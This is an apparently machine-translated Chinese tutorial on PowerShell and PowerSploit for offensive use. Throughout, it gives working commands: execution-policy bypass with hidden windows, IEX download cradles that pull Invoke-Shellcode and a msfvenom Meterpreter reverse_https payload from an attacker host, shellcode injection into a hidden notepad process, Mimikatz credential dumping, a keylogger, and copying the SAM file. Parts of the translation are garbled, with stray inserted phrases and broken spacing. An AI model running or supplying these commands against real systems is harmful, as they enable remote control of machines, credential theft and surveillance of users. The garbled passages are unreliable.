Powershell & Powersploit 入门

责声明">
本文《Powershell & Powersploit 入门》由armyzer0团队原创投稿安全脉搏,安全脉搏发表本文,如需要转载,请先联系安全脉搏授权;未经授权请勿转载。 PowerShel…
本文《Powershell & Powersploit 入门》由军队0队提交安全脉冲,并公布了安全脉冲。如果您需要转载,请先联系安全脉冲授权;请不要擅自转载。 PowerShell是一个命令行脚本环境,可以自动执行在Windows上运行的系统和应用程序管理。您可以将其视为命令行提示符cmd.exe或subversion的扩展。 Powershell需要支持.NET环境并支持.NET对象。可读,易于使用,可以是所有当前shell中的第一个。 Powershell 目前有四个版本的PowerShell,分别为1.0,2.0,3.0和4.0。 powershell1 关于安全脉冲的Powershell有很多文章,请看这里:https://www.com/archives/tag/powershell PowerShell简介 powershell2 powershell3   PowerShell脚本     *本地权限绕过执行PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1   *本地隐藏权限绕过执行脚本PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive-NoProfile -WindowStyle Hidden -File xxx.ps1   从对等方接收数据时失败 * Recon使用目标主机作为内部网信息检测的跳板   ## Powersploit 模块应用程序 Invoke-Shellcode此模块可与MSF结合使用以获得意外结果,此处未对此进行介绍。   首先在目标主机上安装“Invoke-Shellcode”脚本。使用Get-Help +脚本名称查看如何使用它: 命令格式: IEX(New-Object  Net.WebClient).DownloadString('http://IP Adress/CodeExecutio N /调用 - Shellcode.ps1' ) Powersploit4   一:使用MSF中的reverse_https模块进行反弹,设置如下 Powersploit5 最初在Invoke-Shellcode中使用以下命令来弹跳: Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost  192.168.146.129 -Lport 4444 -Force 但是Powersploit更新到3.0,  Invoke-Shellcode脚本没有Lhost和Lport参数,所以我们需要使用另一种方法来实现。 使用msfvenom生成powershell脚本。 Msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.110.129 LPORT=4444 -f powershell -o/var/www/html/test Powersploit6 IEX(New-Object Net.WebClient).DownloadString('http://192.168.110.129/CodeExecution/Invoke-Shellcode.ps1') IEX(New-Object Net.WebClient).DownloadString('http://192.168.110.129/test') Invoke-Shellcode -Shellcode($ buf) Powersploit7 Powersploit8     二:过程注入 首先创建一个隐藏进程: 启动过程  c: \ windows \ system32 \ notepad.exe -WindowStyle隐藏 使用Get-Process命令查看当前进程,记住刚刚创建的隐藏进程ID。 Powersploit9 然后使用Invoke-Shellcode脚本进行进程注入 Invoke-Shellcode -ProcessID 2384 -Shellcode($ buf) Powersploit10 如果您的Powersploit是2.2版,则可以直接使用以下命令。 从对等方接收数据时失败 Invoke-Portscan -Hosts< IP Adress/Rangr> -Ports Powersploit15   Invoke-Mimikatz DUMP密码(请注意,此脚本需要以管理员权限运行) Invoke-Mimikatz - DumpCreds也可以直接运行 Powersploit16 Get-Keystrokes Keylogger Get-Keystrokes -LogPath +<保存位置> Powersploit17     Invoke-NinjaCopy Universal Copy Invoke-NinjaCopy -Path<要复制的文件>  -LocalDestination<复制文件保存位置> 在windows主机上有一个数据库SAM文件,数据中有很多有价值的信息,普通的COPY命令无法复制,使用通用副本可以复制SAM文件 Powersploit18   Invoke-ReverseDnsLookup  DNS查询(似乎没用 -   - !,我希望每个人都告诉我这个东西的用途是什么) Invoke-ReverseDnsLookup -IpRange< IP_Address/Range> Powersploit19 Get-HttpStatus 网站目录检测(似乎没用) Get-HttpStatus -Target< IP Address>  +字典(如果你遇到HTTPS然后添加-UseSSL,在其他端口然后  -Port) Powersploit20   本文《Powershell & Powersploit 入门》由军队0队提交安全脉冲,并公布了安全脉冲。如果您需要转载,请先联系安全脉冲授权;请不要擅自转载。  
  • 发表于 2017-02-22 08:00
  • 阅读 ( 428 )
  • 分类:黑客技术

你可能感兴趣的文章

相关问题

0 条评论

请先 登录 后评论
不写代码的码农
黑客

2107 篇文章

作家榜 »

  1. 黑客 2107 文章